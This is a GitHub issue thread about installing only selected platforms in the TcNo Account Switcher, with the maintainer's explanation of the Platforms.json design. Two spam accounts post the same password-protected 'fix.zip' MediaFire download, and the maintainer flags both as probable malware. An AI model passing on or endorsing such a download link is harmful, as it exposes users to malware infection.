### ISSUE TITLE
[Suggestion] Let us choose which platform support to install

### ISSUE THREAD

**Issue by Void48** [TCNOco/TcNo-Acc-Switcher#388]
Hey, so this might be a big ask? but I would really appreciate it if we could have an option to not install specific platforms, making the app more minimal, smaller, and less bloated. For example, I don’t care about Epic Games or Honkai: Star Rail, so maybe there could be a .bat script that lets us choose which platforms to install?

**Comment by TCNOco** [comment]
Hi.
That's what the major upgrade for 5.0 addressed. Each platform is "Basic" or "Generic" other than Steam and Battle.net.
All platforms (Epic Games, HSR, GOG, etc) are added and controlled by one text file: [Platforms.json](https://github.com/TCNOco/TcNo-Acc-Switcher/blob/master/TcNo-Acc-Switcher-Server/Platforms.json).
You could manually remove platforms here - but the only difference it would make is making this 23.7KB file smaller.
This file will also be updated on the next release, and any modifications will be overwritten.

This file tells the programs where to find files and other bits for account switching. There aren't specific .exes for each one, for example.

Believe me; this was overengineered to save on duplicate code, save space and make it perform faster. Just uncheck the platforms you don't want in the `Manage Platforms` menu using that button on the home screen.

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by TCNOco** [comment]
I won't delete the above comment from @qlqw233, but I would assume this is malware.
I have reported it, you should too.
Do not download or click the link above. This is not a fix, likely a malware spam bot.

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by TCNOco** [comment]
Oh, wow, another virus bot...
